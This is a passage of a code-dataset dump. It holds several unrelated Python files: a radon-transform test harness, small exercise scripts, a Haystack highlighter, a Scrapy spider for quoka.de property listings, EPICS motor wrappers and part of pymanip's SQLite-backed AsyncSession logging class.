returnDifference2D(inData, copy)\n print(\n \"{}{}. {:.2f}% --- step:{} detectorsNum:{} width:{} result:{}\".format(prefix, num, (num / len(stepsArray) * 100), SVal,\n detectors, width, result[S]))\n\n plot2D(stepsArray, result, \"interation\", figSaveName, line=\"bo\")\n saveDataToFile(step,detectors,width,result,figSaveName)\n\n return\n\n\ndef testAlgorithm(stepArr, detectorsArr, widthArr, filter, figSaveName, prefix=\"\"):\n result = np.zeros((len(stepArr), len(detectorsArr), len(widthArr)))\n num=0\n all=len(stepArr)*len(detectorsArr)*len(widthArr)\n inData = data.imread(\"input.png\", as_grey=True)\n inData = inData/max( inData.flatten() )\n\n for S, SVal in enumerate(stepArr):\n for D, DVal in enumerate(detectorsArr):\n for W, WVal in enumerate(widthArr):\n num+=1\n\n sinogram = rn.radonTransform(inData, stepSize=SVal, detectorsNumber=DVal, detectorsWidth=WVal)\n if filter: sinogram = rn.filterSinogram(sinogram)\n inverseRadonImage = rn.inverseRadonTransform(sinogram, stepSize=SVal, detectorsWidth=WVal, outputWidth=len(inData[0]), outputHeight=len(inData))\n\n result[S,D,W] = returnDifference2D(inData, inverseRadonImage)\n print(\"{}{}. {:.2f}% --- step:{} detectorsNum:{} width:{} result:{}\".format(prefix,num,(num/all*100),SVal,DVal,WVal,result[S,D,W]))\n\n smart4DPlot(stepArr, detectorsArr, widthArr, result, figSaveName)\n return\n\ndef plot2D(X,Y,labelX, figSaveName, labelY=\"variation\", line='--bo'):\n plt.gcf().clear()\n plt.plot(X,Y,line)\n plt.xlabel(labelX)\n plt.ylabel(labelY)\n plt.savefig(figSaveName+\".pdf\")\n return\n\ndef plot3D(X,Y,Z,labelX, labelY, figSaveName, labelZ=\"variation\"):\n plt.gcf().clear()\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n cartesian = np.array([ [x,y] for x in X for y in Y ])\n ax.scatter(cartesian[:,0],cartesian[:,1],Z)\n ax.set_xlabel(labelX)\n ax.set_ylabel(labelY)\n ax.set_zlabel(labelZ)\n plt.savefig(figSaveName+\".pdf\")\n return\n\ndef plot4D(X,Y,Z,A, labelX, labelY, labelZ, figSaveName, labelA=\"variation\"):\n plt.gcf().clear()\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n cartesian = np.array([[x, y, z] for x in X for y in Y for z in Z])\n plt.gca().invert_yaxis()\n sp = ax.scatter(cartesian[:,0],cartesian[:,1],cartesian[:,2], c=A, cmap=plt.hot(), marker=\"h\")\n ax.set_xlabel(labelX)\n ax.set_ylabel(labelY)\n ax.set_zlabel(labelZ)\n bar = plt.colorbar(sp)\n bar.set_label(labelA)\n plt.savefig(figSaveName+\".pdf\")\n plt.show()\n return\n\ndef saveDataToFile(X, Y, Z, data, figSaveName):\n with open(figSaveName+\"txt\",\"w\") as file:\n file.write(str(X)+\"\\n\\n\")\n file.write(str(Y)+\"\\n\\n\")\n file.write(str(Z)+\"\\n\\n\")\n file.write(str(data)+\"\\n\\n\")\n\ndef smart4DPlot(X, Y, Z, data, figSaveName, labelX=\"Step\", labelY=\"Number of detectors\", labelZ=\"Detectors width\"):\n saveDataToFile(X,Y,Z,data,figSaveName)\n\n if(len(X)==1 and len(Y)==1 and len(Z)>1 ):\n plot2D(Z, data[0,0,:], labelZ, figSaveName)\n return\n if(len(X)==1 and len(Y)>1 and len(Z)==1 ):\n plot2D(Y, data[0,:,0], labelY, figSaveName)\n return\n if(len(X)>1 and len(Y)==1 and len(Z)==1 ):\n plot2D(X, data[:,0,0], labelX, figSaveName)\n return\n if(len(X)>1 and len(Y)>1 and len(Z)==1):\n plot3D(X,Y,data[:,:,0], labelX, labelY, figSaveName)\n return\n if (len(X)==1 and len(Y) > 1 and len(Z)>1):\n plot3D(Y,Z,data[0,:,:], labelY, labelZ, figSaveName)\n return\n if (len(X)>1 and len(Y)==1 and len(Z)>1):\n plot3D(X,Z,data[:,0,:], labelX, labelZ, figSaveName)\n return\n plot4D(X,Y,Z,data,labelX,labelY,labelZ, figSaveName)\n return\n\ndef runInParallel(*fns):\n proc = []\n for fn in fns:\n p = Process(target=fn)\n p.start()\n proc.append(p)\n for p in proc:\n p.join()\n\ndef main():\n def test1():\n testAlgorithm(step, detectors, detWidth, True, \"main4DFilter\", prefix=\"test1: \")\n def test2():\n testAlgorithm(step, detectors, detWidth, False, \"main4DNoFilter\", prefix=\"test2: \")\n def test3():\n testAlgorithm([1], [200], detWidth, True, \"main2DFilterStep1Detectors200\", prefix=\"test3: \")\n def test4():\n testAlgorithm([1], [200], detWidth, False, \"main2DNoFilterStep1Detectors200\", prefix=\"test4: \")\n def test5():\n testAlgorithm(step, [200], [170], True, \"main2DFilterDetectors200Width170\", prefix=\"test5: \")\n def test6():\n testAlgorithm(step, [200], [170], False, \"main2DNoFilterDetectors200Width170\", prefix=\"test6: \")\n def test7():\n testAlgorithm([1], detectors, [170], True, \"main2DFilterStep1Width170\", prefix=\"test7: \")\n def test8():\n testAlgorithm([1], detectors, [170], False, \"main2DNoFilterStep1Width170\", prefix=\"test8: \")\n def test9(): #TEST ITERACJI\n testIterations(1, 200, 170, True, \"testIterationsFilterStep1Ditectors200Width170\", prefix=\"test9: \")\n def test10(): # TEST ITERACJI\n testIterations(1, 200, 170, False, \"testIterationsNoFilterStep1Ditectors200Width170\", prefix=\"test10: \")\n\n\n runInParallel(test1,test2,test3,test4,test5,test6,test7,test8,test9,test10)\n return\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":7394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"425480531","text":"with open(\"C:/bigdata/Jump_to_Python\\chap04/20180509(수)/방명록.txt\", 'r', encoding='utf-8') as f:\n visitors_list = []\n\n while True:\n visitors_temp = f.readline()\n if not visitors_temp: break\n visitors_list.append(visitors_temp.replace('\\n', ''))\n check_name = input(\"이름을 입력하세요 : \")\n check_flag = False\n for i in visitors_list:\n\n name, birth = map(str, i.split(' '))\n if check_name == name:\n print(\"%s님 다시 방문해 주셔서 감사합니다. 즐거운 시간되세요.\"%check_name)\n check_flag = True\n break\n\nif not check_flag:\n with open(\"C:/bigdata/Jump_to_Python\\chap04/20180509(수)/방명록.txt\", 'a', encoding='utf-8') as f:\n birth = input(\"생년월일을 입력하세요 (예:801212) : \")\n f.write(\"\\n\" + check_name + \" \" + birth)\n print(\"%s님 환영합니다. 아래 내용을 입력하셨습니다.\"% check_name)\n print(\"%s %s\"%(check_name,birth))","sub_path":"01_jumptopy/Jump_to_Python/chap04/20180509(수)/visitors_book.py","file_name":"visitors_book.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"510283188","text":"# -*- coding:utf-8 -*-\nimport sys,json\nreload(sys)\nsys.setdefaultencoding('utf8')\n\nfrom haystack.utils import Highlighter\n\nSYMBOL='。'\n\ndef find_symbol(text_block):\n word_positions = {}\n\n # Pre-compute the length.\n end_offset = len(text_block)\n lower_text_block = text_block.lower()\n # 测试\n for word in ['。', '\\n']:\n if not word in word_positions:\n word_positions[word] = []\n\n start_offset = 0\n\n while start_offset < end_offset:\n # print word\n next_offset = lower_text_block.find(word, start_offset, end_offset)\n\n # If we get a -1 out of find, it wasn't found. Bomb out and\n # start the next word.\n if next_offset == -1:\n break\n\n word_positions[word].append(next_offset)\n start_offset = next_offset + len(word)\n symbol_location_list=word_positions[SYMBOL]\n symbol_location_list.insert(0,0)\n symbol_location_list.insert(-1,len(text_block))\n symbol_location_list.sort()\n return symbol_location_list\n\nclass CustomHighlighter(Highlighter):\n\n def render_html(self, highlight_locations=None, start_offset=None, end_offset=None):\n # Start by chopping the block down to the proper window.\n text = self.text_block[start_offset:end_offset]\n\n # Invert highlight_locations to a location -> term list\n term_list = []\n\n for term, locations in highlight_locations.items():\n term_list += [(loc - start_offset, term) for loc in locations]\n\n loc_to_term = sorted(term_list)\n\n # Prepare the highlight template\n if self.css_class:\n hl_start = '<%s class=\"%s\">' % (self.html_tag, self.css_class)\n else:\n hl_start = '<%s>' % (self.html_tag)\n\n hl_end = '</%s>' % self.html_tag\n\n # Copy the part from the start of the string to the first match,\n # and there replace the match with a highlighted version.\n highlighted_chunk = \"\"\n matched_so_far = 0\n prev = 0\n prev_str = \"\"\n\n for cur, cur_str in loc_to_term:\n # This can be in a different case than cur_str\n actual_term = text[cur:cur + len(cur_str)]\n\n # Handle incorrect highlight_locations by first checking for the term\n if actual_term.lower() == cur_str:\n if cur < prev + len(prev_str):\n continue\n\n highlighted_chunk += text[prev + len(prev_str):cur] + hl_start + actual_term + hl_end\n prev = cur\n prev_str = cur_str\n\n # Keep track of how far we've copied so far, for the last step\n matched_so_far = cur + len(actual_term)\n\n # Don't forget the chunk after the last term\n highlighted_chunk += text[matched_so_far:]\n symbol_location_list = find_symbol(self.text_block)\n\n # print highlight_locations.items()\n start_offset_ext=start_offset\n end_offset_ext=end_offset\n for i in range(0, len(symbol_location_list)-1):\n\n # if symbol_location_list[i] < start_offset:\n # print symbol_location_list[i],symbol_location_list[i+1],\"%%%%\"\n if symbol_location_list[i+1]>start_offset:\n\n start_offset_ext = symbol_location_list[i]\n end_offset_ext = symbol_location_list[i + 1]\n break\n if start_offset-start_offset_ext>50:\n start_offset_ext=start_offset-50\n\n if end_offset_ext-end_offset>50:\n end_offset_ext=end_offset+50\n\n if end_offset_ext>end_offset:\n highlighted_chunk=self.text_block[start_offset_ext:start_offset]+highlighted_chunk\n else:\n highlighted_chunk=self.text_block[start_offset_ext:start_offset]+highlighted_chunk+self.text_block[end_offset:end_offset_ext]\n\n\n if start_offset_ext > 0:\n highlighted_chunk = '。。%s' % highlighted_chunk\n\n if end_offset_ext < len(self.text_block):\n highlighted_chunk = '%s。。。' % highlighted_chunk\n\n return highlighted_chunk","sub_path":"elastic_haystack/basesearch/customhighlighter.py","file_name":"customhighlighter.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"255921098","text":"class Solution(object):\n def canFinish(self, numCourses, prerequisites):\n \"\"\"\n :type numCourses: int\n :type prerequisites: List[List[int]]\n :rtype: List[int]\n \"\"\"\n post = [[] for i in range(numCourses)]\n prerequisite = [0] * numCourses\n l = []\n ans = []\n \n for pairs in prerequisites:\n post[pairs[1]].append(pairs[0])\n prerequisite[pairs[0]] += 1\n \n for i, v in enumerate(prerequisite):\n if v == 0:\n l.append(i)\n\n while l:\n node_remove = l.pop()\n ans.append(node_remove)\n for node in post[node_remove]:\n prerequisite[node] -= 1\n if prerequisite[node] == 0:\n l.append(node)\n\n if len(ans) == numCourses:\n return True\n return False\n","sub_path":"online_judge/leetcode_py/207. Course Schedule.py","file_name":"207. Course Schedule.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"143340019","text":"# File: q2.py\n#\n# ===============================================\n# Problem\n# ===============================================\n# A certain CS professor gives 5-point quizzes that are graded on the scale\n# 5-A, 4-B, 3-C, 2-D, 1-F, 0-F. Write a program that accepts a quiz score as\n# an input and prints out the corresponding grade.\n\ndef main():\n # Program description\n print(\"Test Score Calculator\\n\")\n\n # Input\n score = eval(input(\"Enter a students grade in a 0-5 range: \"))\n\n scoreScale = ['F', 'F', 'D', 'C', 'B', 'A']\n\n print(\"Students score is:\", scoreScale[score])\n\nmain()\n","sub_path":"exercises/ch5/q2.py","file_name":"q2.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"227020944","text":"# -*- coding: utf-8 -*-\nimport re\nimport time\nfrom datetime import datetime\n\nimport dateparser\nimport scrapy\n\nfrom quoka.items import QuokaItem\n\n\ndef build_full_url(url):\n return 'http://www.quoka.de' + url\n\n\ndef get_data(response):\n data = {}\n data['comm'] = response.meta['comm']\n data['classtype'] = response.meta['classtype']\n return data\n\n\nclass QuokaSpider(scrapy.Spider):\n name = 'quoka_spider'\n allowed_domains = ['quoka.de']\n start_urls = [\"http://www.quoka.de/immobilien/bueros-gewerbeflaechen/\"]\n\n counter = 0\n\n def parse(self, response):\n for comm in (0, 1):\n data = {'comm': str(comm), 'classtype': 'of'}\n yield scrapy.http.FormRequest.from_response(response,\n formname=\"frmNaviSearch\",\n formdata=data,\n url=response.url,\n meta=data,\n callback=self.cities)\n\n def cities(self, response):\n city_block = response.xpath(\n '//form[@class=\"SearchFormInsert\"]/.//div[@class=\"cnt\"]')\n data = get_data(response)\n if len(city_block) > 0:\n city_block = city_block[-1]\n\n for city_link in city_block.xpath('.//ul/li/ul/li/a/@href').extract():\n url = build_full_url(city_link)\n yield scrapy.http.FormRequest.from_response(response,\n url=url,\n formname=\"frmNaviSearch\",\n formdata=data,\n meta=data,\n callback=self.page)\n\n def page(self, response):\n next_page = response.xpath(\n '//div[@class=\"rslt-pagination\"]/div/ul/li[contains(@class, \"arr-rgt\") and contains(@class, \"active\")]/a/@href')\n\n data = get_data(response)\n if next_page:\n if len(next_page) > 1:\n next_page = next_page[0]\n url = build_full_url(next_page.extract())\n data['pageno'] = response.xpath(\n '//div[@class=\"rslt-pagination\"]/div/ul/li[contains(@class, \"arr-rgt\") and contains(@class, \"active\")]/a/@data-qng-page')[0].extract()\n\n yield scrapy.http.FormRequest.from_response(response,\n url=url,\n formname=\"frmNaviSearch\",\n formdata=data,\n meta=data,\n callback=self.page)\n\n data = get_data(response)\n item_list = response.xpath(\n '//div[@id=\"ResultListData\"]/ul/li[@class=\"q-ln hlisting\"]')\n for item in item_list:\n href = item.xpath('.//a/@href')[0].extract()\n url = build_full_url(href)\n yield scrapy.Request(url=url,\n meta=data,\n callback=self.item)\n\n def item(self, response):\n self.counter += 1\n i = QuokaItem()\n i['url'] = response.url\n i['erzeugt_am'] = int(time.mktime(datetime.now().timetuple()))\n\n i['Uberschrift'] = response.xpath(\n '//div[@class=\"headline\"]/h1/text()')[0].extract()\n i['PLZ'] = response.xpath(\n '//span[@class=\"postal-code\"]/text()')[0].extract()\n i['OBID'] = response.xpath(\n '//div[contains(text(),\"Anzeige\")]/following-sibling::strong/text()')[0].extract().strip()\n\n i['Beschreibung'] = response.xpath(\n '//div[@class=\"details\"]/div[@class=\"text\"]/text()')[0].extract()\n\n i['Monat'] = datetime.now().month\n try:\n date_string = response.xpath(\n '/html/body/div[3]/div[2]/div[1]/main/div[8]/div/div[3]/div[2]/div[2]/div[4]/following-sibling::text()[1]')[0].extract()\n dt = dateparser.parse(date_string.strip())\n i['Erstellungsdatum'] = int(time.mktime(dt.timetuple()))\n except:\n # Wrong format 'Heute, 22:50 Uhr'\n pass\n i['Gewerblich'] = response.meta['comm']\n i['Stadt'] = response.xpath(\n '//span[@class=\"address location\"]//span[@class=\"locality\"]'\n '/text()').extract_first()\n try:\n i['Kaufpreis'] = response.xpath(\n '//div[@class=\"price\"]//span/text()')[0].extract()\n except:\n # No price on site\n pass\n try:\n i['Immobilientyp'] = response.xpath(\n '/html/body/div[3]/div[2]/header/div[4]/div/div[2]/span[3]/a/span/span/text()')[0].extract()\n\n except:\n pass\n\n telefon_url = response.xpath(\n '//a[contains(@onclick,\"displayphonenumber.php\")]'\n '/@onclick').extract_first()\n if telefon_url:\n m = re.search('load\\( \\'(.+?)\\'', telefon_url)\n if m:\n url = m.group(1)\n request = scrapy.Request(\n response.urljoin(url), self.phone)\n request.meta['item'] = i\n yield request\n else:\n yield i\n\n def phone(self, response):\n i = response.meta['item']\n try:\n i['Telefon'] = response.xpath(\n '/html/body/div[3]/div[2]/div[1]/main/div[8]/div/div[4]/div[1]/div/ul/li/span[2]/span/text()').extract()[0]\n print(i['Telefon'])\n except:\n i['Anbieter_ID'] = u\"Immobilienscout24\"\n return i\n","sub_path":"quoka/quoka/spiders/quoka_spider.py","file_name":"quoka_spider.py","file_ext":"py","file_size_in_byte":5869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"255338197","text":"def gen(number):\n nr = sorted(number)\n return \"\".join(nr) + \"-\" + \"\".join(reversed(nr))\n\ndef calc(number):\n total = 1\n while True:\n nr = number.split(\"-\")\n smal = nr[0]\n large = nr[1]\n summ = str(int(large)-int(smal))\n print(large + \" - \" + smal + \" = \" + summ)\n\n if summ == \"6174\":\n print(\"\\n\" + \"Total: \" + str(total))\n break\n else:\n total += 1\n number = gen(summ)\n\nif __name__ == \"__main__\":\n while True:\n try:\n n = int(input(\"Skriv ett fyrsiffrigt tal: \"))\n if not len(str(n)) == 4:\n continue\n break\n except:\n continue\n print()\n\n calc(gen(str(n)))\n","sub_path":"DattarayaRamchandraKaprekar.py","file_name":"DattarayaRamchandraKaprekar.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"34124805","text":"from epics import PV\nfrom slic.devices.general.motor import Motor\n\n\nclass EXP:\n\n def __init__(self, Id, alias_namespace=None):\n self.Id = Id\n\n ### motors 1.5M JF Zaber ###\n #self.det_x = Motor(Id + ':MOT_TX')\n #self.det_y = Motor(Id + ':MOT_TY')\n self.zaber_x = Motor(Id + \":MOT_TZ\")\n self.qioptiq_zoom = Motor(Id + \":MOT_QIOPT_Z\")\n\n ### motors crystal ###\n #self.c_focus = Motor(Id + ':MOT_VT80')\n #self.c_rot = Motor(Id + ':MOT_ROT')\n\n def __repr__(self):\n s = \"**Detector and crystal positions**\\n\"\n motors = \"zaber_x qioptiq_zoom\".split()\n for motor in motors:\n s += \" - %s %.4f\\n\" % (motor, getattr(self, motor).wm())\n s += \"\\n\"\n\n return s\n\n\n\n","sub_path":"slic/devices/endstations/unused/bernina_europium.py","file_name":"bernina_europium.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"405475029","text":"\"\"\"\n\nThis module defines another kind of session, meant to be used for asynchronous\nmonitoring, where each variable can be logged with its own timestamp.\n\n\"\"\"\n\nimport signal\nimport time\nimport sys\nimport os.path\nimport pickle\nimport warnings\nfrom pprint import pprint\n\nimport sqlite3\nfrom datetime import datetime\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.cbook import mplDeprecation as MatplotlibDeprecationWarning\n\nimport asyncio\nfrom aiohttp import web\nimport aiohttp_jinja2\nimport jinja2\nimport tempfile\nimport smtplib\nfrom email.message import EmailMessage\nfrom clint.textui import colored\nimport requests\nimport json\n\ntry:\n import PyQt5.QtCore\nexcept ModuleNotFoundError:\n pass\n\nfrom pymanip.mytime import dateformat\n\n__all__ = [\"AsyncSession\"]\n\n\nclass AsyncSession:\n database_version = 3\n\n def __init__(self, session_name=None, verbose=True, delay_save=False):\n self.session_name = session_name\n self.custom_figures = None\n self.delay_save = delay_save\n if session_name is not None:\n session_name = str(session_name) # in case it is a Path object\n if session_name.endswith(\".db\"):\n session_name = session_name[:-3]\n elif delay_save:\n raise ValueError(\"Cannot delay_save if session_name is not specified\")\n if session_name is None or delay_save:\n # For no name session, or in case of delay_save=True, then\n # the connection is in-memory\n self.conn = sqlite3.connect(\":memory:\")\n else:\n # Otherwise, the connection is on the disk for immediate writing\n self.conn = sqlite3.connect(session_name + \".db\")\n if delay_save and os.path.exists(session_name + \".db\"):\n # Load existing database into in-memory database\n disk_db = sqlite3.connect(session_name + \".db\")\n try:\n with self.conn as c:\n for line in disk_db.iterdump():\n c.execute(line)\n finally:\n disk_db.close()\n with self.conn as c:\n tables = list(c.execute(\"SELECT name FROM sqlite_master;\"))\n if not tables:\n c.execute(\n \"\"\"\n CREATE TABLE log_names (\n name TEXT);\n \"\"\"\n )\n c.execute(\n \"\"\"\n CREATE TABLE log (\n timestamp INT,\n name TEXT,\n value REAL);\n \"\"\"\n )\n c.execute(\n \"\"\"\n CREATE TABLE dataset_names (\n name TEXT);\n \"\"\"\n )\n c.execute(\n \"\"\"\n CREATE TABLE dataset (\n timestamp INT,\n name TEXT,\n data BLOB);\n \"\"\"\n )\n c.execute(\n \"\"\"\n CREATE TABLE parameters (\n name TEXT,\n value REAL);\n \"\"\"\n )\n c.execute(\n \"\"\"\n INSERT INTO parameters\n (name, value)\n VALUES (?,?);\n \"\"\",\n (\"_database_version\", AsyncSession.database_version),\n )\n c.execute(\n \"\"\"\n INSERT INTO parameters\n (name, value)\n VALUES (?,?);\n \"\"\",\n (\"_session_creation_timestamp\", datetime.now().timestamp()),\n )\n elif verbose:\n self.print_welcome()\n self.figure_list = []\n self.template_dir = os.path.join(os.path.dirname(__file__), \"web\")\n self.static_dir = os.path.join(os.path.dirname(__file__), \"web_static\")\n self.jinja2_loader = jinja2.FileSystemLoader(self.template_dir)\n\n def save_database(self):\n \"\"\"\n If delay_save = True, the database is kept in-memory, and later\n saved to disk when this function is called.\n A new database file will be created with the content of the current\n in-memory database\n \"\"\"\n if self.delay_save:\n try:\n os.remove(self.session_name + \".db\")\n except FileNotFoundError:\n pass\n disk_db = sqlite3.connect(self.session_name + \".db\")\n try:\n with disk_db as c:\n for line in self.conn.iterdump():\n c.execute(line)\n finally:\n disk_db.close()\n\n def __enter__(self):\n return self\n\n def __exit__(self, type_, value, cb):\n self.save_database()\n self.conn.close()\n\n def get_version(self):\n version = self.parameter(\"_database_version\")\n if version is None:\n version = 1\n return version\n\n @property\n def t0(self):\n if hasattr(self, \"_session_creation_timestamp\"):\n return self._session_creation_timestamp\n t0 = self.parameter(\"_session_creation_timestamp\")\n if t0 is not None:\n self._session_creation_timestamp = t0\n return t0\n logged_data = self.logged_first_values()\n if logged_data:\n t0 = min([v[0] for k, v in logged_data.items()])\n self.save_parameter(_session_creation_timestamp=t0)\n self._session_creation_timestamp = t0\n return t0\n return 0\n\n @property\n def initial_timestamp(self):\n return self.t0\n\n @property\n def last_timestamp(self):\n ts = list()\n last_values = self.logged_last_values()\n if last_values:\n ts.append(max([t_v[0] for name, t_v in last_values.items()]))\n for ds_name in self.dataset_names():\n ts.append(max(self.dataset_times(ds_name)))\n if ts:\n return max(ts)\n return None\n\n def print_welcome(self):\n start_string = time.strftime(dateformat, time.localtime(self.initial_timestamp))\n print(colored.blue(\"*** Start date: \" + start_string))\n last = self.last_timestamp\n if last:\n end_string = time.strftime(dateformat, time.localtime(last))\n print(colored.blue(\"*** End date: \" + end_string))\n\n def add_entry(self, **kwargs):\n ts = datetime.now().timestamp()\n with self.conn as c:\n cursor = c.cursor()\n cursor.execute(\"SELECT name FROM log_names;\")\n names = set([d[0] for d in cursor.fetchall()])\n for key, val in kwargs.items():\n if key not in names:\n c.execute(\"INSERT INTO log_names VALUES (?);\", (key,))\n names.add(key)\n c.execute(\"INSERT INTO log VALUES (?,?,?);\", (ts, key, val))\n\n def add_dataset(self, **kwargs):\n ts = datetime.now().timestamp()\n with self.conn as c:\n cursor = c.cursor()\n cursor.execute(\"SELECT name FROM dataset_names;\")\n names = set([d[0] for d in cursor.fetchall()])\n for key, val in kwargs.items():\n if key not in names:\n c.execute(\"INSERT INTO dataset_names VALUES (?);\", (key,))\n names.add(key)\n c.execute(\n \"INSERT INTO dataset VALUES (?,?,?);\",\n (ts, key, pickle.dumps(val, protocol=4)),\n )\n\n def logged_variables(self):\n with self.conn as conn:\n c = conn.cursor()\n c.execute(\"SELECT name FROM log_names;\")\n data = c.fetchall()\n names = set([d[0] for d in data])\n return names\n\n def logged_data(self):\n names = self.logged_variables()\n result = dict()\n for name in names:\n result[name] = self.__getitem__(name)\n return result\n\n def logged_first_values(self):\n with self.conn as conn:\n c = conn.cursor()\n c.execute(\"SELECT name FROM log_names;\")\n names = set([d[0] for d in c.fetchall()])\n result = dict()\n for name in names:\n c.execute(\n \"\"\"SELECT timestamp, value FROM log\n WHERE name='{:}'\n ORDER BY timestamp ASC\n LIMIT 1;\n \"\"\".format(\n name\n )\n )\n result[name] = c.fetchone()\n return result\n\n def logged_last_values(self):\n with self.conn as conn:\n c = conn.cursor()\n c.execute(\"SELECT name FROM log_names;\")\n names = set([d[0] for d in c.fetchall()])\n result = dict()\n for name in names:\n c.execute(\n \"\"\"SELECT timestamp, value FROM log\n WHERE name='{:}'\n ORDER BY timestamp DESC\n LIMIT 1;\n \"\"\".format(\n name\n )\n )\n result[name] = c.fetchone()\n return result\n\n def logged_data_fromtimestamp(self, name, timestamp):\n with self.conn as conn:\n c = conn.cursor()\n c.execute(\n \"\"\"SELECT timestamp, value FROM log\n WHERE name='{:}' AND timestamp > {:}\n ORDER BY timestamp ASC;\n \"\"\".format(\n name, timestamp\n )\n )\n data = c.fetchall()\n t = np.array([d[0] for d in data if d[1] is not None])\n v = np.array([d[1] for d in data if d[1] is not None])\n return t, v\n\n def dataset_names(self):\n with self.conn as conn:\n c = conn.cursor()\n try:\n c.execute(\"SELECT name from dataset_names;\")\n data = c.fetchall()\n except sqlite3.OperationalError:\n return set()\n return set([d[0] for d in data])\n\n def datasets(self, name):\n with self.conn as conn:\n c = conn.cursor()\n try:\n c.execute(\"SELECT name from dataset_names;\")\n data = c.fetchall()\n except sqlite3.OperationalError:\n data = set()\n names = set([d[0] for d in data])\n if name not in names:\n print(\"Possible dataset names are\", names)\n raise ValueError(f'Bad dataset name \"{name:}\"')\n it = c.execute(\n \"\"\"SELECT timestamp, data FROM dataset\n WHERE name='{:}'\n ORDER BY timestamp ASC;\n \"\"\".format(\n name\n )\n )\n for row in it:\n yield row[0], pickle.loads(row[1])\n\n def dataset_last_data(self, name):\n return next(self.datasets(name))\n\n def dataset_times(self, name):\n with self.conn as conn:\n c = conn.cursor()\n it = c.execute(\n \"\"\"SELECT timestamp FROM dataset\n WHERE name='{:}'\n ORDER BY timestamp ASC;\n \"\"\".format(\n name\n )\n )\n t = np.array([v[0] for v in it])\n return t\n\n def dataset(self, name, ts=None):\n if ts is None:\n ts, data = self.dataset_last_data(name)\n return data\n with self.conn as conn:\n c = conn.cursor()\n c.execute(\n \"\"\"SELECT data FROM dataset\n WHERE name='{:}' AND timestamp='{:}';\n \"\"\".format(\n name, ts\n )\n )\n data = pickle.loads(c.fetchone()[0])\n return data\n\n def save_parameter(self, **kwargs):\n with self.conn as conn:\n c = conn.cursor()\n for key, val in kwargs.items():\n c.execute(\n \"\"\"SELECT rowid FROM parameters\n WHERE name='{:}';\n \"\"\".format(\n key\n )\n )\n rowid = c.fetchone()\n if rowid is not None:\n rowid = rowid[0]\n c.execute(\n \"\"\"\n REPLACE INTO parameters\n (rowid, name, value)\n VALUES (?,?,?);\n \"\"\",\n (rowid, key, val),\n )\n else:\n c.execute(\n \"\"\"\n INSERT INTO parameters\n (name, value)\n VALUES (?,?);\n \"\"\",\n (key, val),\n )\n\n def parameter(self, name):\n with self.conn as conn:\n c = conn.cursor()\n c.execute(\n \"\"\"\n SELECT value FROM parameters\n WHERE name='{:}';\n \"\"\".format(\n name\n )\n )\n data = c.fetchone()\n if data:\n return data[0]\n return None\n\n def has_parameter(self, name):\n return self.parameter(name) is not None\n\n def parameters(self):\n with self.conn as conn:\n c = conn.cursor()\n c.execute(\"SELECT * FROM parameters;\")\n data = c.fetchall()\n return {d[0]: d[1] for d in data}\n\n def __getitem__(self, key):\n with self.conn as conn:\n c = conn.cursor()\n c.execute(\n \"\"\"\n SELECT timestamp, value FROM log\n WHERE name='{:}';\n \"\"\".format(\n key\n )\n )\n data = c.fetchall()\n t = np.array([d[0] for d in data])\n v = np.array([d[1] for d in data])\n return t, v\n\n async def send_email(\n self,\n from_addr,\n to_addrs,\n host,\n port=25,\n subject=None,\n delay_hours=6,\n initial_delay_hours=None,\n ):\n \"\"\"\n Asynchronous task which sends an email every delay_hours hours.\n \"\"\"\n\n if self.session_name is None:\n title = \"Pymanip session\"\n else:\n title = self.session_name\n if subject is None:\n subject = title\n\n if initial_delay_hours is None:\n initial_delay_hours = delay_hours / 2\n\n if initial_delay_hours > 0:\n await self.sleep(initial_delay_hours * 3600, verbose=False)\n\n jinja2_autoescape = jinja2.select_autoescape([\"html\"])\n jinja2_env = jinja2.Environment(\n loader=self.jinja2_loader, autoescape=jinja2_autoescape\n )\n template = jinja2_env.get_template(\"email.html\")\n\n while self.running:\n\n dt_n = datetime.now()\n dt_fmt = \"{:}{:02d}{:02d}-{:02d}{:02d}{:02d}\"\n datestr = dt_fmt.format(\n dt_n.year, dt_n.month, dt_n.day, dt_n.hour, dt_n.minute, dt_n.second\n )\n # Generate HTML content\n last_values = self.logged_last_values()\n for name in last_values:\n timestamp, value = last_values[name]\n last_values[name] = (\n timestamp,\n value,\n time.strftime(dateformat, time.localtime(timestamp)),\n )\n n_figs = len(self.figure_list)\n message_html = template.render(\n title=title,\n fignums=range(n_figs),\n datestr=datestr,\n last_values=last_values,\n )\n\n # Create Email message\n msg = EmailMessage()\n msg[\"Subject\"] = subject\n msg[\"From\"] = from_addr\n msg[\"To\"] = to_addrs\n msg.set_content(\"This is a MIME message\")\n msg.add_alternative(message_html, subtype=\"html\")\n\n # Add figure images\n for fignum, fig in enumerate(self.figure_list):\n fd, fname = tempfile.mkstemp(suffix=\".png\")\n with os.fdopen(fd, \"wb\") as f_png:\n fig.canvas.draw_idle()\n fig.savefig(f_png)\n with open(fname, \"rb\") as image_file:\n figure_data = image_file.read()\n os.remove(fname)\n p = msg.get_payload()[1]\n p.add_related(\n figure_data,\n maintype=\"image\",\n subtype=\"png\",\n cid=\"{:d}{:}\".format(fignum, datestr),\n filename=\"fig{:d}-{:}.png\".format(fignum, datestr),\n )\n\n with smtplib.SMTP(host, port) as smtp:\n try:\n 